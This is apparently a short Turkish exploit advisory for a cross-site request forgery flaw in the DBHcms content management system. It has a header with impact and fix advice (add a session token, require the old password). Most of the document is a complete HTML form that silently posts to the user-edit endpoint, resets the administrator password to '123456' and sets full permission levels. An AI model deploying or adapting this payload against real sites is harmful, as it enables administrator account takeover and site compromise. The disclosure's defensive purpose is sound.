< ------------------- header data start ------------------- >

#############################################################

# Application Name : DBHcms

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir, Eski sifre sorulmalidir !

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<form name=dbhcms_edit_user method=post action=http://[site].com/[yol]/index.php?dbhcms_pid=-70>
<input type=hidden name=dbhcms_save_user value=1>
<input type=hidden name=user_login_hidden value=admin>
<input type=hidden name=user_passwd id=user_passwd value=123456 style=width: 98%>
<input type=hidden name=user_name value=DBHcms Administrator style=width: 98%>
<input type=hidden name=user_sex id=user_sex value=ST_MALE style=width: 98%;>
<input type=hidden name=user_company value= style=width: 98%>
<input type=hidden name=user_location value= style=width: 98%>
<input type=hidden name=user_email value=[email protected] style=width: 98%>
<input type=hidden name=user_website value= style=width: 98%>
<input type=hidden name=user_lang id=user_lang value=en style=width: 98%;>
<input type=hidden name=user_level id=user_level value=A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;0;1;2;3;4;5;6;7;8;9 />
<input type=submit value= Tamam >
</form>

< -- bug code end of -- >